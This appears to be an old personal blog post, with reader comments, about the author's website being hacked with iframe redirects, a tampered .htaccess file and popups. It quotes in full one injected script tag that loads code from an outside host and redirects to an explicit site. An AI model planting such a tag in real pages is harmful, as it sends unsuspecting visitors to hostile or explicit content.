I’ve Been Hacked

    Coincidental with my having the week off, I’ve been noticing bizarre behavior in regards to my site. Since I’m using a Mac I didn’t encounter anything outright, but my browser was downloading little “2DimensionOfExploitsEnc.php” files. Most often these text files would be blank, but occasionally I’d see some text. Yesterday I discovered an IFRAME was being added to my site, redirecting people to newiframe.biz. Today, I was seeing redirects to a site called Lahrah’s World, at elleseebee.com. Wanting to avoid any IFRAME trouble, I removed my Shoutbox and my online poll; but I restored them by the end of the day.
    What really got my attention was discovering something was adding code to my site! At the bottom of almost every page I was finding:
<script language="JavaScript" src="http://www.wizardsworldwide.com/chat/chat/localization/czech/catalog/spacer.gif?i=0c2a602a840a150cb337e2406913b775&to=http://www.fucklynx.com/lynx/Boobs/bigtits.html"></script>
    Interestingly, Wizards Worldwide appears to be a Harry Potter chat site. I wonder if the kids who avail themselves of it know it’s apparently a front for Czech hackers.
    This was curious, but it still didn’t raise any alarm bells. It wasn’t till I looked at my webpage with a Windows browser that I found cause for alarm. As soon as it loaded in Internet Explorer, I was confronted with an Active X popup window asking me to click “OK” for free porn movies. My site had really been hacked.
    There was no way I could allow this upon unsuspecting visitors. It’s one thing to accost them with dreadful content and half-baked jokes. It’s another to force illegal porn sites on them. I had little idea how to solve the problem — you really should need a license to operate a website — so it seemed simpler to redirect the webpage myself. It was safer to simply steer people away. So, I edited my “.htaccess” file to send all visitors to Google. Then, since we’re nearing the end of the campaign trail, I wanted to get some last digs in by pointing to BuzzFlash. In the process I discovered someone had been monkeying with the “.htaccess” file. I fixed this and was thus able to restore access to my pMachine control panel — hence this update. It did not solve the problem with that JavaScript code, which, damn it all, is still showing up at the bottom of every page.
    I’ll keep investigating. The blog will remain offline. And, in the interests of avoiding any similar problems from other ignorant amateur webmasters, all I can say is use Mozilla or get a Mac. (Or, perhaps, stay away from Microsoft software, even on a Mac.)

8 Responses to I’ve Been Hacked

  1. Mickey says:

    As you can see, the site came back up on Friday morning.

  2. Russ says:

    Mickey,

    Have you figured out what is causing the java to be attached? We are having the same problem with our site and need to figure it out.

  3. Joe says:

    How did you fix this? I have this problem (which started while I was away as well) and there aren’t any results when I google this for a fix. I’m not sure where this thing lies, so any help you can provide would be greatly appreciated.

    Joe
    NYC

  4. Russ says:

    Joe,

    I see Mickey and I use Ipower.com as web providers. Is that your provider also? If so it may be a virus on their servers.

    Email me at caveboy@anthron.net ASAP

    Russ

  5. Mickey says:

    Is it safe? Evidently the problem resurfaced this morning but seems to be gone now.

    Here’s a link to others’ server woes from back in June.

    …Stupid Russian porn merchants.

  6. Russ says:

    Hey Mickey,

    Brad, my webmaster, reported that the problem went away. Is yours cleared up? I wonder, did you send an email to I Power?

    Russ

  7. Mickey says:

    Yes, I sent them three over the last few days. I never got a response.

  8. Russ Carter says:

    Mickey,

    I assume you are no longer having a problem with your page. We are not either.

    I enjoyed your page, and it seems we enjoy a common link (Jimmy Buffett).

    If our paths cross again it is karma.

    Russ
